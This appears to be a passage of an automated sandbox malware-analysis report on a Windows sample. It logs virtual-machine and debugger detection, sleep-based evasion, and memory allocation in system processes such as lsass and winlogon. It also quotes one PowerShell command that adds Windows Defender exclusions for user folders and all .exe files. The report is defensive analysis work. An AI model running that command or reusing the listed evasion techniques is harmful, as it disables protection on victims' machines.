Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -595406s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -595296s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -595187s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -595077s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -594968s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -594859s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -594750s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -594638s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -594530s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -594421s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -594311s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -594203s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -594093s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -593984s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -593875s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -593765s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -593656s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -593465s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -593324s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -593216s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -593099s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -592979s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -592867s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -592762s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7788	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\dialer.exe TID: 7936	Thread sleep count: 8408 > 30
Source: C:\Windows\System32\dialer.exe TID: 7936	Thread sleep time: -840800s >= -30000s
Source: C:\Windows\System32\dialer.exe TID: 8036	Thread sleep count: 1449 > 30
Source: C:\Windows\System32\dialer.exe TID: 8036	Thread sleep time: -144900s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 7656	Thread sleep count: 2545 > 30
Source: C:\Windows\System32\winlogon.exe TID: 7656	Thread sleep time: -2545000s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 7656	Thread sleep count: 7455 > 30
Source: C:\Windows\System32\winlogon.exe TID: 7656	Thread sleep time: -7455000s >= -30000s

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\PerfDll\hyperProviderSavesinto.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D7ECA0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF7F4D7ECA0
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D6647C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF7F4D6647C
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D930F0 FindFirstFileExA,	0_2_00007FF7F4D930F0
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D5A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	1_2_00D5A69B
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D6C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	1_2_00D6C220
Source: C:\Windows\System32\conhost.exe	Code function: 7_2_000001B0BB98DCE0 FindFirstFileExW,	7_2_000001B0BB98DCE0
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 9_2_00000216D26FDCE0 FindFirstFileExW,	9_2_00000216D26FDCE0
Source: C:\Windows\System32\cmd.exe	Code function: 38_2_00000150E93EDCE0 FindFirstFileExW,	38_2_00000150E93EDCE0
Source: C:\Windows\System32\conhost.exe	Code function: 40_2_00000267FCE9DCE0 FindFirstFileExW,	40_2_00000267FCE9DCE0
Source: C:\Windows\System32\PING.EXE	Code function: 45_2_000002359B52DCE0 FindFirstFileExW,	45_2_000002359B52DCE0
Source: C:\Windows\System32\winlogon.exe	Code function: 49_2_00000225DC64DCE0 FindFirstFileExW,	49_2_00000225DC64DCE0

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

Code function: 0_2_00007FF7F4D850F4 VirtualQuery,GetSystemInfo,

0_2_00007FF7F4D850F4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 600000
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 599812
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 599425
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 599292
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 599094
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 598729
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 598234
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 598125
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 598012
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 597672
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 597546
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 597437
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 597273
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 597171
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 597056
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 596804
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 596662
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 596542
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 596434
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 596327
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 596218
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 596108
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 596000
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 595890
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 595781
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 595628
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 595515
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 595406
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 595296
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 595187
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 595077
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594968
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594859
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594750
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594638
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594530
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594421
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594311
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594203
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594093
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 593984
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 593875
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 593765
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 593656
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 593465
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 593324
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 593216
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 593099
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 592979
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 592867
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 592762
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 922337203685477

Source: C:\PerfDll\hyperProviderSavesinto.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: GargantuaN.exe, 00000001.00000003.1641039969.0000000003502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
Source: wscript.exe, 00000003.00000003.1698379391.000000000332C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}f
Source: hyperProviderSavesinto.exe, 00000008.00000002.1751357469.000000001BB39000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}K
Source: KZcLqgnLvRf.exe, 00000014.00000002.2908332950.000000001B8A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllll:
Source: wscript.exe, 00000003.00000003.1698379391.000000000332C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\C
Source: PING.EXE, 0000002D.00000002.1838656558.000002359AF59000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllhh

Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\dialer.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

Code function: 0_2_00007FF7F4D86900 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF7F4D86900

Contains functionality to read the PEB

Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe

Code function: 1_2_00D77DEE mov eax, dword ptr fs:[00000030h]

1_2_00D77DEE

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

Code function: 0_2_00007FF7F4D94170 GetProcessHeap,

0_2_00007FF7F4D94170

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process token adjusted: Debug
Source: C:\Windows\System32\dialer.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D86900 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF7F4D86900
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D86AE4 SetUnhandledExceptionFilter,	0_2_00007FF7F4D86AE4
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D85CA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF7F4D85CA0
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D8AC28 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF7F4D8AC28
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D6F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00D6F838
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D6F9D5 SetUnhandledExceptionFilter,	1_2_00D6F9D5
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D6FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00D6FBCA
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D78EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00D78EBD
Source: C:\Windows\System32\conhost.exe	Code function: 7_2_000001B0BB98D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_000001B0BB98D2A4
Source: C:\Windows\System32\conhost.exe	Code function: 7_2_000001B0BB987D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_000001B0BB987D90
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 9_2_00000216D26F7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_00000216D26F7D90
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 9_2_00000216D26FD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_00000216D26FD2A4
Source: C:\Windows\System32\cmd.exe	Code function: 38_2_00000150E93ED2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_00000150E93ED2A4
Source: C:\Windows\System32\cmd.exe	Code function: 38_2_00000150E93E7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_00000150E93E7D90
Source: C:\Windows\System32\conhost.exe	Code function: 40_2_00000267FCE97D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	40_2_00000267FCE97D90
Source: C:\Windows\System32\conhost.exe	Code function: 40_2_00000267FCE9D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	40_2_00000267FCE9D2A4
Source: C:\Windows\System32\PING.EXE	Code function: 45_2_000002359B52D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	45_2_000002359B52D2A4
Source: C:\Windows\System32\PING.EXE	Code function: 45_2_000002359B527D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	45_2_000002359B527D90
Source: C:\Windows\System32\winlogon.exe	Code function: 49_2_00000225DC647D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	49_2_00000225DC647D90
Source: C:\Windows\System32\winlogon.exe	Code function: 49_2_00000225DC64D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	49_2_00000225DC64D2A4

Source: C:\PerfDll\hyperProviderSavesinto.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force			Jump to behavior

Allocates memory in foreign processes

Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\winlogon.exe base: 225DC610000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\lsass.exe base: 202C0AB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2A6612D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dwm.exe base: 2BAAF190000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 26A87990000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 17953770000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2295D530000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 253067D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1845B380000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1D559040000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 241A9E70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1CD73160000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Recovery\RuntimeBroker.exe base: 1300000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2824E860000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 21B473C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2086F9D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 17183BC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 23FD3F70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1D2A4150000 protect: page execute and read and write
